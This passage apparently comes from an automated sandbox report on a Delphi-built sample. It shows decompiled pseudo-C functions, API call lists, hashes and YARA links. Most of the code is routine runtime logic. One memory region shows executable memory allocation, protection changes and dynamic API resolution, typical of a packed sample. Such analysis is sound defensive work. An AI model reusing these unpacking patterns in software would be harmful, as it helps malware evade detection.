                                            • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 009455DD
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 009455E3
                                            • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0094560E
                                            • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00945655
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00945665
                                            • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0094568D
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0094569D
                                            • lstrcpyn.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 009456C3
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 009456D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                            • API String ID: 1599918012-2375825460
                                            • Opcode ID: 0b707bdce99eea488b72287de62a4b291babc5a9bc48406088f6b35593b81034
                                            • Instruction ID: 272d423055ce632ad52e95086839a6a97c7f0abe69342411ac1c4f206a478df7
                                            • Opcode Fuzzy Hash: 0b707bdce99eea488b72287de62a4b291babc5a9bc48406088f6b35593b81034
                                            • Instruction Fuzzy Hash: 6F31B471E1065C6BEF25D6F8CC46FEF77AC9B44340F8605E1A604E6182E6B48E888F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00959220, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00959220(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t12;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t12 = FindResourceA(__edx, _v8, _a4); // executed
				_t29 = _t12;
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E009591B0(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x9592c4
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E009591B0(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x9592c4
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x958f88
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00958F48(_t23, _t25, _t18);
			}


















                                            0x00959227
                                            0x0095922a
                                            0x0095922c
                                            0x00959237
                                            0x0095923c
                                            0x0095923e
                                            0x00959241
                                            0x00959243
                                            0x00959246
                                            0x0095924b
                                            0x0095924b
                                            0x0095924c
                                            0x00959256
                                            0x00959258
                                            0x0095925b
                                            0x0095925d
                                            0x00959260
                                            0x00959265
                                            0x00959266
                                            0x00959270
                                            0x00959271
                                            0x00959275
                                            0x0095927e
                                            0x00959289

                                            APIs
                                            • FindResourceA.KERNEL32(00000000,?,?), ref: 00959237
                                            • LoadResource.KERNEL32(00000000,009592C4,00000000,?,?,009550F4,00000000,00000001,00000000,?,00959190,?,?,00956AF2,00000000), ref: 00959251
                                            • SizeofResource.KERNEL32(00000000,009592C4,00000000,009592C4,00000000,?,?,009550F4,00000000,00000001,00000000,?,00959190,?,?,00956AF2), ref: 0095926B
                                            • LockResource.KERNEL32(00958F88,00000000,00000000,009592C4,00000000,009592C4,00000000,?,?,009550F4,00000000,00000001,00000000,?,00959190,?), ref: 00959275
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Resource$FindLoadLockSizeof
                                            • String ID:
                                            • API String ID: 3473537107-0
                                            • Opcode ID: 041223d26a9f301cb761a37bc10d5a082bf0e2fff75e82f148bb0f2104ed4e1b
                                            • Instruction ID: 6de030212a236fdf0df2a7719dab8b88e6c6c21b08b3321f3e6d8f22f75043d2
                                            • Opcode Fuzzy Hash: 041223d26a9f301cb761a37bc10d5a082bf0e2fff75e82f148bb0f2104ed4e1b
                                            • Instruction Fuzzy Hash: 1AF06DB3604204BF5B08EE6DA881E5B77EDDE89260710006AFD18C7206DA31DD014375
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0097088C, Relevance: 3.1, APIs: 2, Instructions: 129COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0097088C(intOrPtr* __eax, signed int* __edx) {
				signed int _v12;
				short _v14;
				char _v16;
				signed int _v20;
				intOrPtr* _v24;
				char _v280;
				signed int _t39;
				signed int _t40;
				signed int _t46;
				signed int _t50;
				signed int _t53;
				intOrPtr _t55;
				intOrPtr _t56;
				signed int _t67;
				signed int _t68;
				void* _t73;
				signed int* _t79;
				intOrPtr _t90;
				intOrPtr* _t96;

				_t79 = __edx;
				_t96 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
					L4:
					_t39 =  *_t79;
					if(_t39 < 0x100 || _t39 > 0x108) {
						_t40 =  *_t79;
						__eflags = _t40 - 0x200;
						if(_t40 < 0x200) {
							L30:
							__eflags = _t40 - 0xb00b;
							if(_t40 == 0xb00b) {
								E0096F1F4(_t96, _t79[1], _t40, _t79[2]);
							}
							L32:
							return  *((intOrPtr*)( *_t96 - 0x14))();
						}
						__eflags = _t40 - 0x20a;
						if(_t40 > 0x20a) {
							goto L30;
						}
						__eflags =  *(_t96 + 0x50) & 0x00000080;
						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
							L16:
							_t46 =  *_t79 - 0x200;
							__eflags = _t46;
							if(__eflags == 0) {
								L21:
								E0098F360( *((intOrPtr*)( *0x99b0ac)), _t79, _t96, __eflags);
								goto L32;
							}
							_t50 = _t46 - 1;
							__eflags = _t50;
							if(_t50 == 0) {
								L22:
								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
								if(__eflags != 0) {
									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
									goto L32;
								}
								return E00943328(_t96, __eflags);
							}
							_t53 = _t50 - 1;
							__eflags = _t53;
							if(_t53 == 0) {
								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
								goto L32;
							}
							__eflags = _t53 == 1;
							if(_t53 == 1) {
								goto L22;
							}
							_t55 =  *0x99cb18; // 0xf012f4
							__eflags =  *((char*)(_t55 + 0x20));
							if( *((char*)(_t55 + 0x20)) == 0) {
								goto L32;
							} else {
								_t56 =  *0x99cb18; // 0xf012f4
								__eflags =  *(_t56 + 0x1c);
								if( *(_t56 + 0x1c) == 0) {
									goto L32;
								}
								_t90 =  *0x99cb18; // 0xf012f4
								_t25 = _t90 + 0x1c; // 0x0
								__eflags =  *_t79 -  *_t25;
								if( *_t79 !=  *_t25) {
									goto L32;
								}
								GetKeyboardState( &_v280);
								_v20 =  *_t79;
								_v16 = E00985BEC( &_v280);
								_v14 = _t79[1];
								_v12 = _t79[2];
								return E00943328(_t96, __eflags);
							}
							goto L21;
						}
						_t67 = _t40 - 0x203;
						__eflags = _t67;
						if(_t67 == 0) {
							L15:
							 *_t79 =  *_t79 - 2;
							__eflags =  *_t79;
							goto L16;
						}
						_t68 = _t67 - 3;
						__eflags = _t68;
						if(_t68 == 0) {
							goto L15;
						}
						__eflags = _t68 != 3;
						if(_t68 != 3) {
							goto L16;
						}
						goto L15;
					}
					_v24 = E00985CA8(_t96);
					if(_v24 == 0) {
						goto L32;
					}
					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
					if(_t73 == 0) {
						goto L32;
					}
				} else {
					_v24 = E00985CA8(__eax);
					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
						goto L4;
					} else {
						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
						if(_t73 == 0) {
							goto L4;
						}
					}
				}
				return _t73;
			}






















                                            0x00970898
                                            0x0097089a
                                            0x009708a0
                                            0x009708d8
                                            0x009708d8
                                            0x009708df
                                            0x00970918
                                            0x0097091a
                                            0x0097091f
                                            0x009709f7
                                            0x009709f7
                                            0x009709fc
                                            0x00970a09
                                            0x00970a09
                                            0x00970a0e
                                            0x00000000
                                            0x00970a14
                                            0x00970925
                                            0x0097092a
                                            0x00000000
                                            0x00000000
                                            0x00970930
                                            0x00970934
                                            0x0097094a
                                            0x0097094c
                                            0x0097094c
                                            0x00970951
                                            0x0097095e
                                            0x00970969
                                            0x00000000
                                            0x00970969
                                            0x00970953
                                            0x00970953
                                            0x00970954
                                            0x00970973
                                            0x00970973
                                            0x00970977
                                            0x00970989
                                            0x00000000
                                            0x00970989
                                            0x00000000
                                            0x0097097f
                                            0x00970956
                                            0x00970956
                                            0x00970957
                                            0x00970990
                                            0x00000000
                                            0x00970990
                                            0x00970959
                                            0x0097095a
                                            0x00000000
                                            0x00000000
                                            0x00970997
                                            0x0097099c
                                            0x009709a0
                                            0x00000000
                                            0x009709a2
                                            0x009709a2
                                            0x009709a7
                                            0x009709ab
                                            0x00000000
                                            0x00000000
                                            0x009709af
                                            0x009709b5
                                            0x009709b5
                                            0x009709b8
                                            0x00000000
                                            0x00000000
                                            0x009709c1
                                            0x009709c8
                                            0x009709d6
                                            0x009709dd
                                            0x009709e4
                                            0x00000000
                                            0x009709f0
                                            0x00000000
                                            0x009709a0
                                            0x00970936
                                            0x00970936
                                            0x0097093b
                                            0x00970947
                                            0x00970947
                                            0x00970947
                                            0x00000000
                                            0x00970947
                                            0x0097093d
                                            0x0097093d
                                            0x00970940
                                            0x00000000
                                            0x00000000
                                            0x00970942
                                            0x00970945
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00970945
                                            0x009708ef
                                            0x009708f6
                                            0x00000000
                                            0x00000000
                                            0x00970905
                                            0x0097090d
                                            0x00000000
                                            0x00970913
                                            0x009708a2
                                            0x009708a9
                                            0x009708b0
                                            0x00000000
                                            0x009708be
                                            0x009708cd
                                            0x009708d2
                                            0x00000000
                                            0x00000000
                                            0x009708d2
                                            0x009708b0
                                            0x00970a1d

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: KeyboardShellStateWindow
                                            • String ID:
                                            • API String ID: 918274741-0
                                            • Opcode ID: c3bb5df30465ca3be1fc2e0c92cd0c53e39d3a6dc6d0a9a43dbe926715f8ed9f
                                            • Instruction ID: d63cf8e21e340a278cec0b791afcac137f96fd7acd7d963c2c17b75d43cfc12e
                                            • Opcode Fuzzy Hash: c3bb5df30465ca3be1fc2e0c92cd0c53e39d3a6dc6d0a9a43dbe926715f8ed9f
                                            • Instruction Fuzzy Hash: 3741A032600659CBDB24DF28C4887ADB7A8BBC5304F5485A5E44CEB396D774DD84CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00972CC0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 134registryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E00972CC0(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x972e81);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = 1 + _t52;
					if(_t53 == 0 || E0096C448 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E0096C448;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0094C910(_t94, _t95, _t109, _t111);
						}
					}
					 *0x99a9f0 = _t111;
					_t96 =  *_t111; // executed
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0094C910(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					DrawTextExW();
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E00975F74(_t111);
					E0095F678( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96); // executed
					SetActiveWindow(1);
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E00943328(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x972e88);
					return E00943FB0( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x99b0f0; // 0x95da04
						E00945D70(_t86,  &_v196);
						_t95 = _v196;
						E0094B580(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00943964();
					} else {
						_t108 =  *0x96bb70; // 0x96bbbc
						if(E009432B8(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E00975D08(_t94);
					}
					goto L7;
				}
			}




















                                            0x00972cc0
                                            0x00972cc0
                                            0x00972cc9
                                            0x00972ccd
                                            0x00972cd3
                                            0x00972cd7
                                            0x00972cd8
                                            0x00972cdd
                                            0x00972ce0
                                            0x00972ceb
                                            0x00972ced
                                            0x00972cf7
                                            0x00972d6c
                                            0x00972d6f
                                            0x00972d84
                                            0x00972d8c
                                            0x00972d8e
                                            0x00972d91
                                            0x00972da2
                                            0x00972dac
                                            0x00972dac
                                            0x00972db1
                                            0x00972dbb
                                            0x00972dca
                                            0x00972dcc
                                            0x00972dcc
                                            0x00972dca
                                            0x00972dd1
                                            0x00972ddf
                                            0x00972de1
                                            0x00972dee
                                            0x00972df0
                                            0x00972df0
                                            0x00972e08
                                            0x00972e26
                                            0x00972e26
                                            0x00972e2e
                                            0x00972e35
                                            0x00972e3a
                                            0x00972e44
                                            0x00972e52
                                            0x00972e57
                                            0x00972e5b
                                            0x00972e63
                                            0x00972e63
                                            0x00972e6a
                                            0x00972e6d
                                            0x00972e70
                                            0x00972e80
                                            0x00972d02
                                            0x00972d02
                                            0x00972d07
                                            0x00972d2c
                                            0x00972d2f
                                            0x00972d35
                                            0x00972d4b
                                            0x00972d50
                                            0x00972d55
                                            0x00972d62
                                            0x00972d67
                                            0x00972d0f
                                            0x00972d11
                                            0x00972d1e
                                            0x00000000
                                            0x00000000
                                            0x00972d27
                                            0x00972d27
                                            0x00000000
                                            0x00972d07

                                            APIs
                                            • GetClassInfoA.USER32 ref: 00972D84
                                            • UnregisterClassA.USER32 ref: 00972DAC
                                            • RegisterClassA.USER32 ref: 00972DC2
                                            • GetWindowLongA.USER32 ref: 00972DFE
                                            • GetWindowLongA.USER32 ref: 00972E13
                                            • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 00972E26
                                            • DrawTextExW.USER32 ref: 00972E2E
                                            • SetActiveWindow.USER32(00000001,00000000,000000F0), ref: 00972E52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$ClassLong$ActiveDrawInfoRegisterTextUnregister
                                            • String ID: @
                                            • API String ID: 572206105-2766056989
                                            • Opcode ID: d90b55d8afc97d2b92515ea1642d82215a2fc24ea42a2c021a4456c7c52a9acc
                                            • Instruction ID: a9f704ca583a7b9e830927c5a96e7f7f7aaeec43ddb2e7021c26b14a3719ce57
                                            • Opcode Fuzzy Hash: d90b55d8afc97d2b92515ea1642d82215a2fc24ea42a2c021a4456c7c52a9acc
                                            • Instruction Fuzzy Hash: 55519F72A107189BDB21EB78CC45F9AB3F9BF85304F108569F849DB292DB30AE45CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0457D320, Relevance: 3.2, APIs: 2, Instructions: 195memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0457D36B
                                            • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0457D512
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.284544934.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: false
                                            Similarity
                                            • API ID: Virtual$AllocProtect
                                            • String ID:
                                            • API String ID: 2447062925-0
                                            • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                            • Instruction ID: 1926bdb69e26a7675df437ff101cd953b0233c26f9c3920229f464e2b938da10
                                            • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                                            • Instruction Fuzzy Hash: 3D919775A0010ADFCB48CF88D590EAEB7B6BF88304F148159E819AB345D735FA56CFA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0457D740, Relevance: 3.1, APIs: 2, Instructions: 86memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,00000004,00000040,?), ref: 0457D7DB
                                            • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 0457D813
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.284544934.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: false
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                            • Instruction ID: 7fa07a0f0638aa258d789627da44a45ebbe4e7e82ad3ff89e5d2173ed723c5e1
                                            • Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                                            • Instruction Fuzzy Hash: C8418374A00209EFCB08CF88D891BEDB7B1FF88314F1485A9E919AB351D775AA45CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0457D0D0, Relevance: 3.1, APIs: 2, Instructions: 77libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 0457D12B
                                            • GetProcAddress.KERNELBASE(?,?), ref: 0457D18A
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.284544934.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: false
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID:
                                            • API String ID: 2574300362-0
                                            • Opcode ID: 6d5c053a8b1e1b56e3ea23abd1abaa051be6f67e11c47a19d1c305c84768a659
                                            • Instruction ID: e95228404b335ad25c0f3d8fa145de735c94edacfd4c6f53f5d5bc53929134f0
                                            • Opcode Fuzzy Hash: 6d5c053a8b1e1b56e3ea23abd1abaa051be6f67e11c47a19d1c305c84768a659
                                            • Instruction Fuzzy Hash: 32319674A00209EFCB04CF98D880BADB7B5FF88314F1482A9E819AB355D735AA45CF94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0457CDD0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0457CE54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.284544934.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: false
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: VirtualAlloc
                                            • API String ID: 4275171209-164498762
                                            • Opcode ID: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                            • Instruction ID: 73a1ec55858e27fa455f39dfabbdd95c6b3b515b60b8145e913bcea53d6a6001
                                            • Opcode Fuzzy Hash: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
                                            • Instruction Fuzzy Hash: 22111260D082CDDEFF01DBE89409BEFBFB55F11708F044098D5496B282D6BA575887B6
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00941554, Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00941554(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00941408(0x99c5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                            0x00941557
                                            0x00941561
                                            0x00941570
                                            0x00941563
                                            0x00941563
                                            0x00941563
                                            0x00941576
                                            0x00941583
                                            0x00941588
                                            0x0094158a
                                            0x0094158e
                                            0x00941597
                                            0x0094159e
                                            0x009415aa
                                            0x009415b1
                                            0x00000000
                                            0x009415b1
                                            0x0094159e
                                            0x009415b6

                                            APIs
                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0094185D), ref: 00941583
                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0094185D), ref: 009415AA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 9a5b2d9bdf5c4b6e0e8f44e3d39b663a2167309c4ee168af42e9260668b82bd6
                                            • Instruction ID: 2b3b763bcbb55355c3cf886f30c40206aa46363f0f9dd0010921c1eb8e09b61a
                                            • Opcode Fuzzy Hash: 9a5b2d9bdf5c4b6e0e8f44e3d39b663a2167309c4ee168af42e9260668b82bd6
                                            • Instruction Fuzzy Hash: 03F0A7B2F4072027EF605A694D81F926AC89FC5BA0F154171F90DEF3C9D6A18C8146E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0095B310, Relevance: 1.7, APIs: 1, Instructions: 190COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
                                            			E0095B310(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char _v20;
				void* _v21;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr* _t116;
				intOrPtr _t127;
				intOrPtr _t162;
				void* _t191;
				void* _t192;
				intOrPtr _t218;
				void* _t231;
				void* _t232;
				void* _t233;
				intOrPtr _t234;

				_t230 = __esi;
				_t229 = __edi;
				_t232 = _t233;
				_t234 = _t233 + 0xffffffd0;
				_v48 = 0;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v12 = __edx;
				_v8 = __eax;
				 *[fs:eax] = _t234;
				E0095B6F8(0);
				_v16 = 0;
				_t116 =  *0x99c850; // 0xf00890
				 *((intOrPtr*)( *_t116 + 0x14))( *[fs:eax], 0x95b62b, _t232, __edi, __esi, __ebx, _t231);
				 *[fs:eax] = _t234;
				 *[fs:eax] = _t234;
				_t189 =  *_v8;
				 *((intOrPtr*)( *_v8 + 0x24))( *[fs:eax], 0x95b5ca, _t232,  *[fs:eax], 0x95b609, _t232);
				_t235 = _v12;
				if(_v12 != 0) {
					_v16 = _v12;
					E0095B71C(_v8,  &_v20,  &_v40, __eflags);
					__eflags =  *(_v16 + 0x1c) & 0x00000010;
					if(__eflags == 0) {
						 *(_v16 + 0x1c) =  *(_v16 + 0x1c) | 0x00000001;
						_t127 = _v16;
						_t41 = _t127 + 0x1c;
						 *_t41 =  *(_t127 + 0x1c) | 0x00000002;
						__eflags =  *_t41;
						E0095B71C(_v8,  &_v20,  &_v52, __eflags);
						E0095B2B0(_v52,  &_v48, __eflags);
						 *((intOrPtr*)( *_v16 + 0x18))();
					} else {
						E0095B71C(_v8,  &_v20,  &_v44, __eflags);
					}
				} else {
					E0095B71C(_v8,  &_v20,  &_v32, _t235);
					_v16 =  *((intOrPtr*)(E009563E8(_v32, __edi, _t235) + 0x2c))();
					E0095B71C(_v8, 0,  &_v36, _t235);
					 *((intOrPtr*)( *_v16 + 0x18))();
				}
				 *((intOrPtr*)(_v8 + 0x18)) = _v16;
				 *((intOrPtr*)(_v8 + 0x74)) = E00956138(_t189, E00943074(_v16), 1, _t229, _t230, 1);
				_push(_t232);
				_push(0x95b56f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t234;
				 *((intOrPtr*)(_v8 + 0x1c)) = _v16;
				_v28 =  *((intOrPtr*)(E00946064() + 8));
				if(_v28 == 0) {
					 *((intOrPtr*)(_v8 + 0x34)) = E009430FC(1);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = _v28;
				}
				_push(_t232);
				_push(0x95b54f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t234;
				if(E00956CE4( *((intOrPtr*)(_v8 + 0x34)),  *((intOrPtr*)(_v8 + 0x18))) < 0) {
					E00956B2C( *((intOrPtr*)(_v8 + 0x34)),  *((intOrPtr*)(_v8 + 0x18)));
				}
				 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_v8 + 0x18));
				 *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) =  *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) | 0x00000001;
				 *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) =  *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) | 0x00000002;
				IntersectRect(??, ??, ??);
				 *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) =  *( *((intOrPtr*)(_v8 + 0x18)) + 0x1c) & 0x0000fffd;
				if(_v28 != 0) {
					L14:
					_pop(_t218);
					 *[fs:eax] = _t218;
					_push(E0095B556);
					if(_v28 == 0) {
						E0094312C( *((intOrPtr*)(_v8 + 0x34)));
					}
